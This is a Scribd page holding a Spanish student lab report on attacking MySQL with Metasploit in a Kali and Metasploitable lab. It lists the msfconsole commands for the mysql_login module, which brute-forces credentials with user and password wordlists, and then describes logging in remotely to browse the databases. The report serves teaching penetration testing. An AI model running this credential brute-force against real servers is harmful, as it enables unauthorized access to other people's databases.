Scribd
Cargar
385 vistas4 páginas

Atacar Mysql Con Metasploit

Este documento describe los pasos para atacar una base de datos MySQL usando Metasploit. Explica cómo instalar las máquinas virtuales Kali Linux y Metasploitable, escanear Metasploitable con Metasploit para encontrar credenciales válidas de MySQL, y luego conectarse remotamente a la base de datos MySQL para ejecutar comandos.

Cargado por

Luis Angel Perez Herrera
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
385 vistas4 páginas

Atacar Mysql Con Metasploit

Este documento describe los pasos para atacar una base de datos MySQL usando Metasploit. Explica cómo instalar las máquinas virtuales Kali Linux y Metasploitable, escanear Metasploitable con Metasploit para encontrar credenciales válidas de MySQL, y luego conectarse remotamente a la base de datos MySQL para ejecutar comandos.

Cargado por

Luis Angel Perez Herrera
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
Está en la página 1/ 4

UNIVERSIDAD DE LA SIERRA SUR

Prctica Tercer Parcial


Ataque a Mysql

Luis Angel
18/06/2014




Atacar Mysql con Metasploit
Prctica realizada con la mquina Metasploitable y Kali Linux, en este casp Metasploitable ya viene
configurado con vulnerabilidades para llevar a cabo prcticas de penetracin. A continuacin se
describirn cules fueron los pasos que se realizaron para llevar a cabo esta prctica.
1. Instalacin de las mquinas virtuales, se debern instalar una mquina virtual para Kali
Linux y Metasplotable.
2. Una vez instaladas se deber poder hacer ping desde cada una de las mquinas.
3. En nuestro Kali abrimos una terminal y tecleamos
#msfconsole
A continuacin ya estaremos en la consola del Metasploit que trae kali integrado.
4. Tecleamos los siguientes comandos
# msfconsole
msf > search mysql
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set RHOSTS [IP_Objetivo]
msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit
framework/data/wordlists/unix_users.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploitframework/
data/wordlists/unix_passwords.txt
msf auxiliary(mysql_login) >exploit
En donde IP_Objetivo ser la direccin IP de la mquina virtual en la que fue instalado
Metasploitable. Una vez puesto el ltimo comando se conectar al host remoto y
comenzar a buscar las contraseas en el servidor mysql.

Cuando el escaneo encuentra un usuario y contrasea vlido se mostrar un cono verde en la
parte izquierda de la consola.

Una vez encontrado un usuario vlido procederemos a conectar remotamente con la base de
datos de la siguiente manera.


Ya dentro de la consola de mysql podemos hacer uso de los comandos de mysql como por
ejemplo:
Mostrar las bases de datos que se encuentran en mysql.
Show databases
Hacer uso de una base de datos en especial
Use database_name

También podría gustarte